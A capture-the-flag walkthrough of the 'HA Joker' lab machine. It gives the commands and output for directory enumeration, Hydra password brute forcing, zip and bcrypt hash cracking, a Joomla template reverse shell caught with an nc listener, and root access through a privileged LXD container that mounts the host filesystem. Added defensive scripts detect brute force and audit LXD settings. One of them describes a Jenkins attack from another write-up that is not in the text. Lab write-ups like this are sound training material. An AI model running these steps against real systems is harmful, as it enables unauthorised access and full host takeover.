[+] Extensions:     txt,php,html
[+] Timeout:        10s
===============================================================
2020/06/22 23:31:44 Starting gobuster
===============================================================
/.hta (Status: 403)
/.hta.txt (Status: 403)
/.hta.php (Status: 403)
/.hta.html (Status: 403)
/.htaccess (Status: 403)
/.htaccess.txt (Status: 403)
/.htaccess.php (Status: 403)
/.htaccess.html (Status: 403)
/.htpasswd (Status: 403)
/.htpasswd.txt (Status: 403)
/.htpasswd.php (Status: 403)
/.htpasswd.html (Status: 403)
/css (Status: 301)
/img (Status: 301)
/index.html (Status: 200)
/index.html (Status: 200)
/phpinfo.php (Status: 200)
/phpinfo.php (Status: 200)
/secret.txt (Status: 200)
/server-status (Status: 403)
===============================================================
2020/06/22 23:33:12 Finished
===============================================================

Answer: secret.txt

#5 – There is another file which reveals information of the backend, what is it?

Answer: phpinfo.php

#6 – When reading the secret file, we find a conversation that seems to contain at least two users and some keywords that can be interesting. What user do you think it is?

$ curl -s http://10.10.130.207/secret.txt
Batman hits Joker.
Joker: "Bats you may be a rock but you won't break me." (Laughs!)
Batman: "I will break you with this rock. You made a mistake now."
Joker: "This is one of your 100 poor jokes, when will you get a sense of humor bats! You are dumb as a rock."
Joker: "HA! HA! HA! HA! HA! HA! HA! HA! HA! HA! HA! HA!"

Answer: joker

#7 – What port on this machine need to be authenticated by Basic Authentication Mechanism?

$ curl -i http://10.10.130.207:8080
HTTP/1.1 401 Unauthorized
Date: Tue, 23 Jun 2020 06:46:52 GMT
Server: Apache/2.4.29 (Ubuntu)
WWW-Authenticate: Basic realm=" Please enter the password."
Content-Length: 461
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>401 Unauthorized</title>
</head><body>
<h1>Unauthorized</h1>
<p>This server could not verify that you
are authorized to access the document
requested.  Either you supplied the wrong
credentials (e.g., bad password), or your
browser doesn't understand how to supply
the credentials required.</p>
<hr>
<address>Apache/2.4.29 (Ubuntu) Server at 10.10.130.207 Port 8080</address>
</body></html>

Answer: 8080

#8 – At this point we have one user and a URL that needs to be authenticated. Brute force it to get the password. What is that password?

Hint: Maybe burp with format user:pass and encode with base64? Note: Don’t forget decode it!!

Let’s brute force joker’s password with Hydra:

$ hydra -l joker -P /data/src/wordlists/rockyou.txt -s 8080 10.10.130.207 http-get
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-06-23 09:07:05
[WARNING] You must supply the web page as an additional option or via -m, default path set to /
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344398 login tries (l:1/p:14344398), ~896525 tries per task
[DATA] attacking http-get://10.10.130.207:8080/
[8080][http-get] host: 10.10.130.207   login: joker   password: hannah
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-06-23 09:07:32

Answer: hannah
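What the two hydra runs on this page look like from the server side, as an added example that belongs to neither write-up: the Basic-auth attack above produces a burst of 401 responses from one source, while the Jenkins form brute force in thm-internal is a burst of POSTs to /j_acegi_security_check which, because it rides the ssh -L tunnel, reaches the container from the Docker host address 172.17.0.1 rather than from the attacker. The detector below keeps a per-source sliding window and also flags hydra’s default User-Agent, Mozilla/5.0 (Hydra). Log lines are constructed in Apache combined format (Jenkins does not write that format itself, so assume a reverse proxy in front of it); the threshold, window and IPs are assumptions.

```python
"""Added example, not from either write-up: spot the two hydra runs (Basic
auth on Joker's port 8080, the Jenkins login form on Internal) in web
server access logs. Lines are constructed in Apache combined format;
thresholds and addresses are assumptions."""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone
from typing import Dict, List, Optional

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"
LOGIN_PATHS = {"/j_acegi_security_check"}   # Jenkins form login, from the Burp capture
WINDOW = timedelta(seconds=60)
THRESHOLD = 20                              # auth attempts per source per window


def parse(line: str) -> Optional[dict]:
    """Parse one combined-format line; None for anything that does not fit."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ev = m.groupdict()
    ev["ts"] = datetime.strptime(ev["ts"], TS_FMT)
    ev["status"] = int(ev["status"])
    return ev


def is_auth_attempt(ev: dict) -> bool:
    """A 401 is a Basic-auth failure (hydra http-get). A POST to the form
    login endpoint is counted whatever its status: Jenkins answers a bad
    password with a 302 redirect, not an error code."""
    return ev["status"] == 401 or (ev["method"] == "POST" and ev["path"] in LOGIN_PATHS)


def detect(lines: List[str]) -> Dict[str, dict]:
    """Sliding window per source IP. A source is reported when it exceeds
    THRESHOLD attempts inside WINDOW or sends hydra's default User-Agent."""
    recent: Dict[str, deque] = defaultdict(deque)
    alerts: Dict[str, dict] = {}
    for line in lines:
        ev = parse(line)
        if ev is None or not is_auth_attempt(ev):
            continue
        q = recent[ev["ip"]]
        q.append(ev["ts"])
        while ev["ts"] - q[0] > WINDOW:     # drop attempts older than the window
            q.popleft()
        hydra_ua = "hydra" in ev["ua"].lower()
        if len(q) >= THRESHOLD or hydra_ua:
            a = alerts.setdefault(ev["ip"], {"attempts": 0, "hydra_ua": False})
            a["attempts"] = max(a["attempts"], len(q))
            a["hydra_ua"] = a["hydra_ua"] or hydra_ua
    return alerts


def make_sample_log() -> List[str]:
    """Constructed log. 10.8.50.72 is the attacker box guessing Basic-auth
    passwords on Joker; the Jenkins guesses arrive through the ssh -L tunnel,
    so inside the container the source is the Docker host, 172.17.0.1, with a
    browser User-Agent set through hydra's H= option. 10.10.10.5 is a user
    who mistyped a password three times."""
    base = datetime(2020, 6, 23, 9, 7, 5, tzinfo=timezone.utc)
    browser = "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0"

    def line(ip, ts, req, status, ua):
        return f'{ip} - - [{ts.strftime(TS_FMT)}] "{req}" {status} 461 "-" "{ua}"'

    lines = [line("10.8.50.72", base, "GET /index.html HTTP/1.1", 200, browser)]
    for i in range(25):
        lines.append(line("10.8.50.72", base + timedelta(seconds=i // 3), "GET / HTTP/1.0", 401, "Mozilla/5.0 (Hydra)"))
    lines.append(line("10.8.50.72", base + timedelta(seconds=9), "GET / HTTP/1.0", 200, "Mozilla/5.0 (Hydra)"))
    for i in range(3):
        lines.append(line("10.10.10.5", base + timedelta(seconds=20 * i), "GET / HTTP/1.1", 401, browser))
    for i in range(30):
        lines.append(line("172.17.0.1", base + timedelta(seconds=i), "POST /j_acegi_security_check HTTP/1.1", 302, browser))
    return lines
```

The tunnel case is the one to remember: a brute force that arrives from 172.17.0.1 points at the Docker host, and the real origin only shows up in that host’s sshd or auth logs for aubreanna’s session.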

#9 – Yeah!! We got the user and password and we see a cms based blog. Now check for directories and files in this port. What directory looks like as admin directory?

Hint: Nikto with the credentials we obtained?

The application hosted on port 8080 seems to be a Joomla CMS.

There is a robots.txt file (http://10.10.130.207:8080/robots.txt) that discloses several locations, one of which (/administrator/) is particularly interesting:

$ curl -s -H "Authorization: Basic am9rZXI6aGFubmFo" http://10.10.130.207:8080/robots.txt
# If the Joomla site is installed within a folder 
# eg www.example.com/joomla/ then the robots.txt file 
# MUST be moved to the site root 
# eg www.example.com/robots.txt
# AND the joomla folder name MUST be prefixed to all of the
# paths. 
# eg the Disallow rule for the /administrator/ folder MUST 
# be changed to read 
# Disallow: /joomla/administrator/
#
# For more information about the robots.txt standard, see:
# http://www.robotstxt.org/orig.html
#
# For syntax checking, see:
# http://tool.motoricerca.info/robots-checker.phtml

User-agent: *
Disallow: /administrator/
Disallow: /bin/
Disallow: /cache/
Disallow: /cli/
Disallow: /components/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /layouts/
Disallow: /libraries/
Disallow: /logs/
Disallow: /modules/
Disallow: /plugins/
Disallow: /tmp/

Answer: /administrator/

#10 – We need access to the administration of the site in order to get a shell, there is a backup file, What is this file?

Let’s search for some common extensions for backups:

$ gobuster dir -U joker -P hannah -u http://10.10.130.207:8080/ -x bak,old,tar,gz,tgz,zip,7z -w /data/src/wordlists/common.txt 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.130.207:8080/
[+] Threads:        10
[+] Wordlist:       /data/src/wordlists/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Auth User:      joker
[+] Extensions:     bak,old,tar,gz,tgz,zip,7z
[+] Timeout:        10s
===============================================================
2020/06/23 09:33:15 Starting gobuster
===============================================================
/.hta (Status: 403)
/.hta.bak (Status: 403)
/.hta.old (Status: 403)
/.hta.tar (Status: 403)
/.hta.gz (Status: 403)
/.hta.tgz (Status: 403)
/.hta.zip (Status: 403)
/.hta.7z (Status: 403)
/.htaccess (Status: 403)
/.htaccess.zip (Status: 403)
/.htaccess.7z (Status: 403)
/.htaccess.bak (Status: 403)
/.htaccess.old (Status: 403)
/.htaccess.tar (Status: 403)
/.htaccess.gz (Status: 403)
/.htaccess.tgz (Status: 403)
/.htpasswd (Status: 403)
/.htpasswd.gz (Status: 403)
/.htpasswd.tgz (Status: 403)
/.htpasswd.zip (Status: 403)
/.htpasswd.7z (Status: 403)
/.htpasswd.bak (Status: 403)
/.htpasswd.old (Status: 403)
/.htpasswd.tar (Status: 403)
/administrator (Status: 301)
/bin (Status: 301)
/backup (Status: 200)
/backup.zip (Status: 200)
/cache (Status: 301)

[REDACTED]

Answer: backup.zip

#11 – We have the backup file and now we should look for some information, for example database, configuration files, etc … But the backup file seems to be encrypted. What is the password?

Hint: Use john to crack the zip hash

We download the backup file and try to uncompress it, but it requires a password:

$ wget --user=joker --password=hannah http://10.10.130.207:8080/backup.zip
$ unzip backup.zip 
Archive:  backup.zip
   creating: db/
[backup.zip] db/joomladb.sql password:

Let’s crack the password:

$ zip2john backup.zip > backup.hash
$ john backup.hash
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 8 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:./password.lst
hannah           (backup.zip)
1g 0:00:00:00 DONE 2/3 (2020-06-23 10:16) 6.250g/s 584006p/s 584006c/s 584006C/s 123456..faithfaith
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Answer: hannah

#12 – Remember that… We need access to the administration of the site… Blah blah blah. In our new discovery we see some files that have compromising information, maybe db? ok what if we do a restoration of the database! Some tables must have something like user_table! What is the super duper user?

Unzipping the backup.zip archive reveals two folders, db and site, containing respectively an SQL dump of the database (2415 lines) and a copy of the website.

In the site directory we find the Joomla configuration file, which contains the database password:

$ head -n20 configuration.php 
<?php
class JConfig {
    public $offline = '0';
    public $offline_message = 'This site is down for maintenance.<br />Please check back again soon.';
    public $display_offline_message = '1';
    public $offline_image = '';
    public $sitename = 'joker';
    public $editor = 'tinymce';
    public $captcha = '0';
    public $list_limit = '20';
    public $access = '1';
    public $debug = '0';
    public $debug_lang = '0';
    public $dbtype = 'mysqli';
    public $host = 'localhost';
    public $user = 'joomla';
    public $password = '1234';
    public $db = 'joomladb';
    public $dbprefix = 'cc1gr_';
    public $live_site = '';

But since we don’t currently have access to the database, we are more interested in valid users for the Joomla website.

Let’s search for the interesting table:

$ grep -H 'CREATE TABLE' joomladb.sql | grep user
joomladb.sql:CREATE TABLE `cc1gr_user_keys` (
joomladb.sql:CREATE TABLE `cc1gr_user_notes` (
joomladb.sql:CREATE TABLE `cc1gr_user_profiles` (
joomladb.sql:CREATE TABLE `cc1gr_user_usergroup_map` (
joomladb.sql:CREATE TABLE `cc1gr_usergroups` (
joomladb.sql:CREATE TABLE `cc1gr_users` (

And now that we know the table:

$ grep cc1gr_users joomladb.sql 
-- Table structure for table `cc1gr_users`
DROP TABLE IF EXISTS `cc1gr_users`;
CREATE TABLE `cc1gr_users` (
-- Dumping data for table `cc1gr_users`
LOCK TABLES `cc1gr_users` WRITE;
/*!40000 ALTER TABLE `cc1gr_users` DISABLE KEYS */;
INSERT INTO `cc1gr_users` VALUES (547,'Super Duper User','admin','admin@example.com','$2y$10$b43UqoH5UpXokj2y9e/8U.LD8T3jEQCuxG2oHzALoJaj9M5unOcbG',0,1,'2019-10-08 12:00:15','2019-10-25 15:20:02','0','{\"admin_style\":\"\",\"admin_language\":\"\",\"language\":\"\",\"editor\":\"\",\"helpsite\":\"\",\"timezone\":\"\"}','0000-00-00 00:00:00',0,'','',0);
/*!40000 ALTER TABLE `cc1gr_users` ENABLE KEYS */;

The “Super Duper User” is admin.
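grep is enough to spot the row, but a mysqldump INSERT packs every field into one line with backslash-escaped quotes, so reading it by eye is error-prone. The script below is an added example, not part of the original write-up: it tokenizes the VALUES tuples of the `<prefix>users` table, pairs each value with the column names from the CREATE TABLE statement, and reports which password hash scheme each account uses. SAMPLE_DUMP is constructed for the demo; its column list is modelled on Joomla 3's users table (an assumption), the first row is the one shown above and the second row is invented to show a legacy md5:salt hash.

```python
"""Pull account rows out of a mysqldump file by table prefix.

Added example (not from the original write-up). SAMPLE_DUMP is constructed;
its schema is modelled on Joomla 3's users table (an assumption).
"""
import re


def iter_tuples(text):
    """Yield the body of each top-level (...) tuple in a VALUES clause,
    ignoring parentheses that sit inside single-quoted strings."""
    depth = start = i = 0
    in_str = False
    while i < len(text):
        c = text[i]
        if in_str:
            if c == "\\": i += 1           # skip the escaped character
            elif c == "'": in_str = False
        elif c == "'": in_str = True
        elif c == "(":
            if depth == 0: start = i + 1
            depth += 1
        elif c == ")":
            depth -= 1
            if depth == 0: yield text[start:i]
        i += 1


def split_values(tup):
    """Split one tuple body into Python values: int, str or None."""
    out, i, n = [], 0, len(tup)
    while i < n:
        if tup[i] in " ,":
            i += 1
        elif tup[i] == "'":
            buf, i = [], i + 1
            while tup[i] != "'":
                if tup[i] == "\\":         # mysqldump escapes \ ' " \n \t \0
                    i += 1
                    buf.append({"n": "\n", "t": "\t", "0": "\0"}.get(tup[i], tup[i]))
                else:
                    buf.append(tup[i])
                i += 1
            out.append("".join(buf))
            i += 1                         # step past the closing quote
        else:
            j = tup.find(",", i)
            j = n if j == -1 else j
            tok = tup[i:j].strip()
            out.append(None if tok == "NULL" else int(tok) if re.fullmatch(r"-?\d+", tok) else tok)
            i = j
    return out


def table_columns(dump, table):
    """Column names, in order, from the CREATE TABLE statement of `table`."""
    m = re.search(r"CREATE TABLE `%s` \((.*?)\n\)" % re.escape(table), dump, re.S)
    if not m:
        raise KeyError(table)
    return re.findall(r"^\s*`(\w+)`", m.group(1), re.M)


def classify_hash(h):
    """Joomla stored md5:salt before 3.2 and bcrypt ($2y$) afterwards."""
    if h.startswith(("$2y$", "$2a$", "$2b$")):
        return "bcrypt"
    if re.fullmatch(r"[0-9a-f]{32}(:.*)?", h):
        return "md5 (legacy)"
    return "unknown"


def find_user_accounts(dump, prefix):
    """One dict per row of `<prefix>users`, with the hash algorithm added."""
    table = prefix + "users"
    cols = table_columns(dump, table)
    rows = []
    for line in dump.splitlines():
        if not line.startswith(f"INSERT INTO `{table}` VALUES "):
            continue
        for tup in iter_tuples(line[line.index("VALUES") + 6:]):
            vals = split_values(tup)
            if len(vals) != len(cols):
                raise ValueError(f"{table}: expected {len(cols)} fields, got {len(vals)}")
            row = dict(zip(cols, vals))
            row["hash_type"] = classify_hash(row["password"])
            rows.append(row)
    return rows


# Constructed dump fragment: row 547 is the one from the write-up, row 548 is
# invented (md5 of a well-known test password plus a made-up salt).
SAMPLE_DUMP = r"""
CREATE TABLE `cc1gr_users` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `name` varchar(400) NOT NULL DEFAULT '',
  `username` varchar(150) NOT NULL DEFAULT '',
  `email` varchar(100) NOT NULL DEFAULT '',
  `password` varchar(100) NOT NULL DEFAULT '',
  `block` tinyint(4) NOT NULL DEFAULT 0,
  `sendEmail` tinyint(4) DEFAULT 0,
  `registerDate` datetime NOT NULL,
  `lastvisitDate` datetime NOT NULL,
  `activation` varchar(100) NOT NULL DEFAULT '',
  `params` text NOT NULL,
  `lastResetTime` datetime NOT NULL,
  `resetCount` int(11) NOT NULL DEFAULT 0,
  `otpKey` varchar(1000) NOT NULL DEFAULT '',
  `otep` varchar(1000) NOT NULL DEFAULT '',
  `requireReset` tinyint(4) NOT NULL DEFAULT 0,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
INSERT INTO `cc1gr_users` VALUES (547,'Super Duper User','admin','admin@example.com','$2y$10$b43UqoH5UpXokj2y9e/8U.LD8T3jEQCuxG2oHzALoJaj9M5unOcbG',0,1,'2019-10-08 12:00:15','2019-10-25 15:20:02','0','{\"admin_style\":\"\",\"admin_language\":\"\",\"language\":\"\",\"editor\":\"\",\"helpsite\":\"\",\"timezone\":\"\"}','0000-00-00 00:00:00',0,'','',0),(548,'Legacy Editor','editor','editor@example.com','5f4dcc3b5aa765d61d8327deb882cf99:constructedsalt',0,0,'2018-01-01 00:00:00','2018-01-01 00:00:00','','{}','0000-00-00 00:00:00',0,'','',1);
"""
```

The hash classification is the part worth keeping in an audit script: a backup that still carries md5:salt entries means those accounts were never re-hashed after a Joomla upgrade, and they fall to a wordlist far faster than the bcrypt hash cracked in the next step.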

#13 – Super Duper User! What is the password?

Hint: Again, john and mysql hash password.

The hash of the admin’s password is $2y$10$b43UqoH5UpXokj2y9e/8U.LD8T3jEQCuxG2oHzALoJaj9M5unOcbG

Save it to admin.hash and crack it with John:

$ /data/src/john/run/john admin.hash --wordlist=/data/src/wordlists/rockyou.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
abcd1234         (?)
1g 0:00:00:07 DONE (2020-06-23 10:30) 0.1259g/s 136.0p/s 136.0c/s 136.0C/s bullshit..brownie
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

The password is abcd1234.

#14 – At this point, you should upload a reverse-shell in order to gain shell access. What is the owner of this session?

Hint: Maybe use error.php page on a template? Of course try it and execute ‘id’ command.

We are now able to authenticate with admin:abcd1234 to the administration backend of Joomla. Let’s create a webshell.

From the Control Panel go to Configuration > Templates > Templates > Beez3 Details and Files. Click on error.php to edit the code and replace it with a PHP reverse shell.

Open a listener (rlwrap nc -nlvp 4444) and in your browser, visit the error page (http://10.10.130.207:8080/templates/beez3/error.php). You should now have a reverse shell.

$ rlwrap nc -nlvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.130.207.
Ncat: Connection from 10.10.130.207:42946.
Linux ubuntu 4.15.0-55-generic #60-Ubuntu SMP Tue Jul 2 18:22:20 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
 01:36:59 up  1:53,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data),115(lxd)
/bin/sh: 0: can't access tty; job control turned off
$ SHELL=/bin/bash script -q /dev/null
www-data@ubuntu:/$ whoami
whoami
www-data
www-data@ubuntu:/$

Answer: www-data

#15 – This user belongs to a group that differs from your own group, What is this group?

Hint: Linux containers

We are a member of the lxd group, which reveals that LXD (Linux containers) is installed on the host:

www-data@ubuntu:/$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data),115(lxd)

Answer: lxd

#16 – Spawn a tty shell.

Hint: python3

You can do that as follows:

$ SHELL=/bin/bash script -q /dev/null

Or with python:

$ python3 -c "import pty;pty.spawn('/bin/bash')"

#17 – In this question you should do a basic research on how linux containers (LXD) work, it has a small online tutorial. Googling “lxd try it online”.

Read documentation about LXC / LXD: https://linuxcontainers.org/lxd/introduction/

#18 – List the image installed on the lxd-service, what is the ALIAS of this image?

Hint: lxc image ls

Now, let’s list the images installed:

www-data@ubuntu:/$ lxc image list
lxc image list
+-------+-------------+--------+-------------+------+------+-------------+
| ALIAS | FINGERPRINT | PUBLIC | DESCRIPTION | ARCH | SIZE | UPLOAD DATE |
+-------+-------------+--------+-------------+------+------+-------------+

There is none, even though the room expects a myalpine image to be present. If your list is empty too, you can build and import the image yourself.

First download the image on your machine:

$ git clone https://github.com/saghul/lxd-alpine-builder.git
$ cd lxd-alpine-builder
$ ./build-alpine

Transfer the resulting tar.gz file (e.g. alpine-v3.12-x86_64-20200623_1255.tar.gz) to the target.

Now, on the target, import the image.

www-data@ubuntu:/tmp$ lxc image import alpine-v3.12-x86_64-20200623_1255.tar.gz --alias myalpine
<-v3.12-x86_64-20200623_1255.tar.gz --alias myalpine
www-data@ubuntu:/tmp$ lxc image list
lxc image list
+----------+--------------+--------+-------------------------------+--------+--------+-------------------------------+
|  ALIAS   | FINGERPRINT  | PUBLIC |          DESCRIPTION          |  ARCH  |  SIZE  |          UPLOAD DATE          |
+----------+--------------+--------+-------------------------------+--------+--------+-------------------------------+
| myalpine | f3c94a02e9d8 | no     | alpine v3.12 (20200623_12:55) | x86_64 | 3.07MB | Jun 23, 2020 at 11:07am (UTC) |
+----------+--------------+--------+-------------------------------+--------+--------+-------------------------------+
www-data@ubuntu:/tmp$

Answer: myalpine

#19 – The idea here is to mount the root of the OS file system on the container, this should give us access to the root directory. Create the container with the privilege true and mount the root file system on /mnt in order to gain access to /root directory on host machine.

Hint: lxc init … lxc config device … lxc start … lxc exec …

www-data@ubuntu:/tmp$ lxc init myalpine joker -c security.privileged=true
lxc init myalpine joker -c security.privileged=true
Creating joker
www-data@ubuntu:/tmp$ lxc config device add joker mydevice disk source=/ path=/mnt/root recursive=true
<ydevice disk source=/ path=/mnt/root recursive=true
Device mydevice added to joker
www-data@ubuntu:/tmp$ lxc start joker
lxc start joker
www-data@ubuntu:/tmp$ lxc exec joker /bin/sh
lxc exec joker /bin/sh
~ # id
id
uid=0(root) gid=0(root)
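The whole escalation rests on two host-side conditions: an unprivileged account sitting in the lxd group (question #15) and LXD accepting a privileged container that mounts the host's root filesystem (this step). The script below is an added example, not part of the original write-up or of LXD itself: it audits /etc/group for members of root-equivalent groups and inspects `lxc list --format json` output for instances that are privileged or carry disk devices backed by a host path. Both inputs are constructed inline; the JSON field names (`config`/`devices` and their `expanded_*` forms) follow LXD's instance objects but should be checked against your LXD version, and the list of root-equivalent groups is a local-policy assumption.

```python
"""Audit a host for the two LXD weaknesses used in this write-up.

Added example, not from the original page or from LXD. SAMPLE_ETC_GROUP and
SAMPLE_LXC_LIST are constructed; the JSON shape is assumed to match
`lxc list --format json` (config/devices plus expanded_* variants).
"""
import json

# Membership here is root-equivalent on most hosts (assumption: local policy).
ROOT_EQUIVALENT_GROUPS = {"lxd", "docker", "disk", "sudo", "wheel"}


def parse_etc_group(text):
    """Map group name -> list of supplementary members from /etc/group text."""
    groups = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        name, _pw, _gid, members = line.split(":", 3)
        groups[name] = [m for m in members.split(",") if m]
    return groups


def audit_groups(text):
    """One finding per user who sits in a root-equivalent group."""
    findings = []
    for name, members in parse_etc_group(text).items():
        if name in ROOT_EQUIVALENT_GROUPS:
            for m in members:
                findings.append({"kind": "group", "subject": m,
                                 "detail": f"member of {name} (root-equivalent)"})
    return findings


def audit_instances(lxc_list_json):
    """Flag privileged instances and disk devices backed by a host path.

    Devices that reference a storage pool are normal root disks; a device with
    an absolute `source` and no `pool` exposes a host directory to the container.
    """
    findings = []
    for inst in json.loads(lxc_list_json):
        cfg = inst.get("expanded_config") or inst.get("config") or {}
        devs = inst.get("expanded_devices") or inst.get("devices") or {}
        privileged = str(cfg.get("security.privileged", "false")).lower() == "true"
        host_mounts = [f"{d['source']} -> {d.get('path', '?')}"
                       for d in devs.values()
                       if d.get("type") == "disk" and "pool" not in d
                       and str(d.get("source", "")).startswith("/")]
        if privileged or host_mounts:
            severity = "critical" if privileged and host_mounts else "high" if privileged else "medium"
            findings.append({"kind": "instance", "subject": inst["name"], "severity": severity,
                             "privileged": privileged, "host_mounts": host_mounts})
    return findings


def audit(etc_group_text, lxc_list_json):
    return audit_groups(etc_group_text) + audit_instances(lxc_list_json)


# Constructed inputs mirroring the state reached in the write-up.
SAMPLE_ETC_GROUP = """root:x:0:
sudo:x:27:
www-data:x:33:
lxd:x:115:www-data
docker:x:999:
"""

SAMPLE_LXC_LIST = json.dumps([
    {"name": "joker", "status": "Running",
     "config": {"security.privileged": "true"},
     "devices": {"mydevice": {"type": "disk", "source": "/", "path": "/mnt/root", "recursive": "true"}},
     "expanded_config": {"security.privileged": "true"},
     "expanded_devices": {"mydevice": {"type": "disk", "source": "/", "path": "/mnt/root", "recursive": "true"},
                          "root": {"type": "disk", "path": "/", "pool": "default"}}},
    {"name": "web", "status": "Running", "config": {}, "devices": {},
     "expanded_config": {}, "expanded_devices": {"root": {"type": "disk", "path": "/", "pool": "default"}}},
])

if __name__ == "__main__":
    for f in audit(SAMPLE_ETC_GROUP, SAMPLE_LXC_LIST):
        print(f)
```

Run against a live host, the two inputs come from `cat /etc/group` and `lxc list --format json`. The fixes follow from the findings: keep service accounts such as www-data out of the lxd group (membership is a documented root-equivalent grant), and treat `security.privileged=true` together with a host-path disk device as a configuration that should never be allowed for untrusted users.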

#20 – What is the name of the file in the /root directory?

Answer: final.txt

Author : https://www.aldeid.com/wiki/TryHackMe-HA-Joker-CTF